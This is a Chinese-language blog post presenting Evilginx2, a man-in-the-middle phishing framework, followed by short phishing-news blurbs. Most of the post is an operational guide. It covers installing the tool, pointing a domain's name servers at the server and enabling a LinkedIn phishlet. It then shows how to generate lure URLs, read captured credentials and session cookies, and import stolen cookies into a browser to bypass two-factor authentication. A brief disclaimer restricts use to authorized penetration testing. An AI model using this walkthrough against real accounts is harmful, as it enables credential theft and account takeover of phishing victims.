一款高级网络钓鱼攻击框架

VSole2023-07-19 10:16:53

Evilginx2介绍

evilginx2是一个中间人攻击框架,用于网络钓鱼登录凭据以及会话cookie,从而允许绕过双因素身份验证保护。

该工具是2017年发布的Evilginx的升级产品,它使用自定义版本的nginx HTTP服务器提供中间人功能,作为浏览器和网络钓鱼网站之间的代理。当前版本完全用GO作为独立应用程序编写,它实现了自己的HTTP和DNS服务器,使其易于设置和使用。

Evilginx2用途声明

我非常清楚Evilginx2可以用于恶意目的。这项工作仅仅证明了攻击者可以做些什么。防御者有责任考虑此类攻击并找到保护其用户免受此类网络钓鱼攻击的方法。Evilginx只能在合法渗透测试任务中使用,并且必须得到被破坏方的书面许可。

Evilginx2安装与使用

可以使用预编译的二进制包,也可以从源代码编译evilginx2。需要一个外部服务器,在其中托管evilginx2安装。

从源代码安装

要从源代码编译,请确保已安装版本至少为1.10.0的GO(从此处获取)并且正确设置环境变量 $GOPATH (def. $HOME/go)

安装完毕后,将它添加到你的~/.profile,假设你安装GO在/usr/local/go:

export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

然后加载它source ~/.profiles。

现在你应该准备安装evilginx2了:

sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2make

您现在可以从本地目录运行evilginx2,如:

sudo ./bin/evilginx -p ./phishlets/

或全局安装:

sudo make installsudo evilginx

上面的说明也可用于将evilginx2更新到最新版本。

使用Docker安装

您可以从Docker中启动evilginx2。首先构建容器:

docker build . -t evilginx2

然后你可以运行容器:

docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets装在容器内/app/phishlets,可以作为配置安装。

从预编译的二进制包安装

从这里抓住你想要的包

如果要进行系统范围的安装,请使用具有root权限的安装脚本:

chmod 700 ./install.shsudo ./install.shsudo evilginx

或者只是从当前目录启动evilginx2(您还需要root权限):

chmod 700 ./evilginxsudo ./evilginx

用法

重要!确保端口上没有服务侦听TCP 443,TCP 80并且UDP 53。您可能需要关闭apache或nginx以及用于解析可能正在运行的DNS的任何服务。如果无法在任何这些端口上打开侦听,evilginx2将在启动时告诉您。

默认情况下,evilginx2将在./phishlets/目录中以及稍后的目录中查找网络钓鱼/usr/share/evilginx/phishlets/。如果要指定从中加载网络钓鱼的自定义路径,请-p 在启动工具时使用该参数。

Usage of ./evilginx:  -debug        Enable debug output  -developer        Enable developer mode (generates self-signed certificates for all hostnames)  -p string        Phishlets directory path

您应该看到evilginx2徽标,并提示输入命令。键入help或help 是否要查看可用命令或有关它们的更多详细信息。

入门

要启动并运行,您需要先进行一些设置。

此时我假设您已经注册了一个域名(让我们称之为yourdomain.com),您在域名提供商的管理面板中设置名称服务器(两者ns1和ns2)以指向服务器的IP(例如10.0.0.1):

ns1.yourdomain.com = 10.0.0.1ns2.yourdomain.com = 10.0.0.1

使用以下命令设置服务器的域和IP:

config domain yourdomain.comconfig ip 10.0.0.1

现在您可以设置要使用的网络钓鱼。为了这个简短的指南,我们将使用LinkedIn网络钓鱼。设置网络钓鱼的主机名(显然必须包含您的域名):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

现在你可以enable使用phishlet,它会启动LetsEncrypt SSL / TLS证书的自动检索,如果你在本地找不到你选择的主机名:

phishlets enable linkedin

您的网上诱骗网站现已上线。想想URL,您希望受害者在成功登录时被重定向到并获得这样的网络钓鱼URL(受害者将被重定向到https://www.google.com):

phishlets get-url linkedin https://www.google.com

运行phishlets只响应标记化链接,所以谁扫描您的主域的任何扫描仪将被重定向到URL指定为redirect_url下config。如果要隐藏您的网络钓鱼并使其甚至不响应有效的标记化网络钓鱼URL,请使用phishlet hide/unhide 命令。

您可以使用以下方式监控捕获的凭据和会话cookie

sessions

要获取有关捕获的会话的详细信息,请使用会话cookie本身(将在底部以JSON格式打印),选择其会话ID:

sessions <id>

可以使用EditThisCookie扩展将已捕获的会话Cookie复制并导入Chrome浏览器。

重要!如果您希望evilginx2在从服务器注销后继续运行,则应在screen会话中运行它。

网络钓鱼
本作品采用《CC 协议》,转载必须注明作者和本文链接
Microsoft警告说,中间对手(AiTM)网络钓鱼技术正在增加,这些技术正在作为网络钓鱼即服务(PhaaS)网络犯罪模型的一部分进行传播。
网络钓鱼网络攻击者们经常采用的一种社会工程学攻击手段,通过采用欺诈性操纵的策略,诱骗企业员工点击可疑链接、打开被感染的电子邮件,或暴露他们的账户信息。据思科公司研究报告显示,86%的企业都遇到过网络钓鱼攻击,而只要有一名内部员工沦为网络钓鱼攻击的受害者,就可能会危及整个组织网络系统的安全性。
IDSA报告揭秘2022年最可怕的攻击方式!
网络钓鱼攻击变得越来越普遍,而且只会变得越来越诡计多端。虽然有众多方法可以保护自己免受网络钓鱼攻击,但最有效的方法之一是能够识破它们。有鉴于此,本文在下面列出了表明电子邮件或其他通信内容可能是网络钓鱼企图的10个常见迹象。
摩尔多瓦的政府机构受到一波网络钓鱼攻击的袭击,威胁行为者向属于该国国家服务的账户发送了 1,330 多封电子邮件。
网络钓鱼19式
2022-11-27 07:33:13
随着技术的进步,黑客和网络犯罪分子将不断开发新的网络钓鱼技术来窃取敏感数据。更专业的攻击者甚至会从合法公司复制完全相同的电子邮件格式,并包含恶意链接、文档或图像文件,以欺骗用户“确认”其个人信息或自动下载恶意代码。建议通过适当的渠道与该帐户的个人核实沟通。在过去,浏览器可以检测到没有启用HTTPS的网站,这是防止网络犯罪的第一道防线。
攻击者正在欺骗广泛使用的加密货币交易所来欺骗用户登录,以便他们可以窃取他们的凭据并最终窃取他们的资金。
网络钓鱼是大家所熟悉的一种网络攻击,这种攻击也被认为是一种社会工程攻击,主要是黑客通过将自己伪装起来,进行欺骗和收集受害者的个人敏感信息。这种类型的攻击一般而言,是通过短信或者是电子邮件进行网络钓鱼,电子邮件钓鱼攻击,是比较有效的网络之一,很多的网络攻击都是源自于电子邮件的钓鱼攻击。
网络钓鱼依然是当今企业面临的头号网络安全威胁,从凭证泄露到恶意软件投放,超过八成的网络攻击都将网络钓鱼作为初始攻击媒介。根据APWG最新发布的网络钓鱼活动趋势报告,2022年第一季度共检测到1,025,968次网络钓鱼攻击,创下季度历史新高。2022年3月发生了384,291次攻击,创下月度攻击次数的纪录。
与去年同期相比,第一季度利用 Microsoft 品牌进行的网络钓鱼攻击实例增加了 266%。
VSole
网络安全专家